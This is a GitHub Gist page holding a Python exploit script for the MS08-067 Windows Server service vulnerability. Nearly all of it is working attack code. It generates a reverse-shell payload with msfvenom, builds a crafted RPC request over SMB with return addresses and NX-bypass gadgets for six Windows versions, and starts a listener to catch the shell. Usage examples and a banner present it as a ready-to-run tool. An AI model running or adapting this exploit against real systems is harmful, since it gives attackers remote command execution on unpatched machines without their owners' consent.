Last active
November 14, 2023 13:40
-
-
Save jrmdev/5881544269408edde11335ea2b5438de to your computer and use it in GitHub Desktop.
MS08-067 Exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # This exploit code is a re-work of the code from Andy Acer: | |
| # https://github.com/andyacer/ms08_067/blob/master/ms08_067_2018.py | |
| # For best experience: pip install nclib | |
| import sys, struct | |
| from threading import Thread | |
| from subprocess import run as runcmd, PIPE, DEVNULL | |
| try: | |
| from impacket import smb | |
| from impacket import uuid | |
| from impacket.dcerpc.v5 import transport | |
| from impacket.smbconnection import SessionError | |
| from impacket.nmb import NetBIOSTimeout | |
| except ImportError: | |
| print ("Import error: please install impacket (https://github.com/CoreSecurity/impacket)") | |
| sys.exit(1) | |
| try: | |
| from nclib import TCPServer | |
| except ImportError: # will use netcat instead | |
| pass | |
| class SRVSVC_Exploit(Thread): | |
| def __init__(self, target, os, port=445, lhost='0.0.0.0', lport=4444): | |
| super(SRVSVC_Exploit, self).__init__() | |
| self.port = port | |
| self.target = target | |
| self.os = os | |
| self.lhost = lhost | |
| self.lport = int(lport) | |
| if self.os == '1': | |
| print('Windows XP SP0/SP1 Universal\n') | |
| elif self.os == '2': | |
| print('Windows 2000 Universal\n') | |
| elif self.os == '3': | |
| print('Windows 2003 SP0 Universal\n') | |
| elif self.os == '4': | |
| print('Windows 2003 SP1 English\n') | |
| elif self.os == '5': | |
| print('Windows XP SP3 French (NX)\n') | |
| elif self.os == '6': | |
| print('Windows XP SP3 English (NX)\n') | |
| else: | |
| print('Not supported OS version\n') | |
| sys.exit(-1) | |
| self.gen_shellcode() | |
| def gen_shellcode(self): | |
| print("[+] Generating shellcode ...") | |
| res = runcmd(["msfvenom", "-p", "windows/shell_reverse_tcp", "LHOST=%s" % self.lhost, "LPORT=%d" % self.lport, "EXITFUNC=thread", "-b", "\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\\x40", "-f", "raw", "-a", "x86", "--platform", "windows"], stdout=PIPE, stderr=DEVNULL) | |
| self.shellcode = "\x90" * (410 - len(res.stdout)) + res.stdout.decode('latin-1') | |
| def listen(self): | |
| print("[+] Setting up listener ...") | |
| server = TCPServer((self.lhost, self.lport)) | |
| for client in server: | |
| print('[+] Received connection from %s:%d' % client.peer) | |
| command = "" | |
| while command != "exit": | |
| try: | |
| if len(command) > 0: | |
| if command in client.readln().decode('utf-8').strip(" "): | |
| pass | |
| data = client.read_until('>') | |
| print(data.decode('utf-8'), end="") | |
| command = input(" ") | |
| client.writeln(command) | |
| except KeyboardInterrupt: | |
| client.writeln("exit") | |
| client.close() | |
| break | |
| except Exception as e: | |
| print("\nException Occurred: %s" % str(e)) | |
| client.close() | |
| break | |
| break | |
| def __DCEPacket(self): | |
| nonxjmper = "\x08\x04\x02\x00%s" + "A" * 4 + "%s" + "A" * 42 + "\x90" * 8 + "\xeb\x62" + "A" * 10 | |
| if self.os == '1': | |
| ret = "\x61\x13\x00\x01" | |
| jumper = nonxjmper % (ret, ret) | |
| elif self.os == '2': | |
| ret = "\xb0\x1c\x1f\x00" | |
| jumper = nonxjmper % (ret, ret) | |
| elif self.os == '3': | |
| ret = "\x9e\x12\x00\x01" # 0x01 00 12 9e | |
| jumper = nonxjmper % (ret, ret) | |
| elif self.os == '4': | |
| ret_dec = "\x8c\x56\x90\x7c" # 0x7c 90 56 8c dec ESI, ret @SHELL32.DLL | |
| ret_pop = "\xf4\x7c\xa2\x7c" # 0x 7c a2 7c f4 push ESI, pop EBP, ret @SHELL32.DLL | |
| jmp_esp = "\xd3\xfe\x86\x7c" # 0x 7c 86 fe d3 jmp ESP @NTDLL.DLL | |
| disable_nx = "\x13\xe4\x83\x7c" # 0x 7c 83 e4 13 NX disable @NTDLL.DLL | |
| jumper = "\x08\x04\x02\x00%s%s%s" + "A" * 28 + "%s" + "\xeb\x02" + "\x90" * 2 + "\xeb\x62" % (ret_dec * 6, ret_pop, disable_nx, jmp_esp * 2) | |
| elif self.os == '5': | |
| ret = "\x07\xf8\x5b\x59" # 0x59 5b f8 07 | |
| disable_nx = "\xc2\x17\x5c\x59" # 0x59 5c 17 c2 | |
| jumper = nonxjmper % (disable_nx, ret) | |
| elif self.os == '6': | |
| ret = "\x07\xf8\x88\x6f" # 0x6f 88 f8 07 | |
| disable_nx = "\xc2\x17\x89\x6f" # 0x6f 89 17 c2 | |
| jumper = nonxjmper % (disable_nx, ret) | |
| print('[+] Initiating connection ...') | |
| if self.port == '445': | |
| self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target) | |
| else: | |
| self.__trans = transport.SMBTransport(remoteName='*SMBSERVER', remote_host='%s' % self.target, dstport = int(self.port), filename = '\\browser' ) | |
| try: | |
| self.__trans.connect() | |
| self.__dce = self.__trans.DCERPC_class(self.__trans) | |
| self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0'))) | |
| except (SessionError, NetBIOSTimeout) as e: | |
| print("[-] Error: %s" % str(e)) | |
| sys.exit(-1) | |
| print('[+] Connected to ncacn_np:%s[\\pipe\\browser]' % self.target) | |
| try: | |
| from nclib import TCPServer | |
| Thread(target=self.listen).start() | |
| except ImportError: | |
| print("[+] Please start a netcat listener: nc -lvp %d, press enter to continue ..." % self.lport) | |
| input() | |
| path = "\x5c\x00" + "ABCDEFGHIJ" * 10 + self.shellcode | |
| path += "\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00" + jumper + "\x00" * 2 | |
| server = "\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00" | |
| prefix = "\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00" | |
| MaxCount = "\x36\x01\x00\x00" | |
| Offset = "\x00\x00\x00\x00" | |
| ActualCount = "\x36\x01\x00\x00" | |
| self.__stub = server + MaxCount + Offset + ActualCount + path + "\xE8\x03\x00\x00" + prefix + "\x01\x10\x00\x00\x00\x00\x00\x00" | |
| def run(self): | |
| self.__DCEPacket() | |
| self.__dce.call(0x1f, self.__stub) | |
| if __name__ == '__main__': | |
| if len(sys.argv) != 6: | |
| print('\nUsage: %s <target ip> <os #> <Port #> <LHOST> <LPORT>\n' % sys.argv[0]) | |
| print('Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445') | |
| print('Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)') | |
| print('Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal') | |
| print('Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English') | |
| print('Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)') | |
| print('Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)') | |
| sys.exit(-1) | |
| else: | |
| print(""" | |
| @@@@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@@@@@@ | |
| @@@@@@@@@@@ @@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@ @@@@@@@@ | |
| @@! @@! @@! !@@ @@! @@@@ @@! @@@ @@! @@@@ !@@ @@! | |
| !@! !@! !@! !@! !@! @!@!@ !@! @!@ !@! @!@!@ !@! !@! | |
| @!! !!@ @!@ !!@@!! @!@ @! !@! !@!!@! @!@!@!@!@ @!@ @! !@! !!@@!@! @!! | |
| !@! ! !@! !!@!!! !@!!! !!! !!@!!! !!!@!@!!! !@!!! !!! @!!@!!!! !!! | |
| !!: !!: !:! !!:! !!! !!: !!! !!:! !!! !:! !:! !!: | |
| :!: :!: !:! :!: !:! :!: !:! :!: !:! :!: !:! :!: | |
| ::: :: :::: :: ::::::: :: ::::: :: ::::::: :: :::: ::: :: | |
| : : :: : : : : : : : : : : : : : :: : : : : | |
| """) | |
| target, os, port, lhost, lport = sys.argv[1:] | |
| current = SRVSVC_Exploit(target, os, port, lhost, lport) | |
| current.run() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment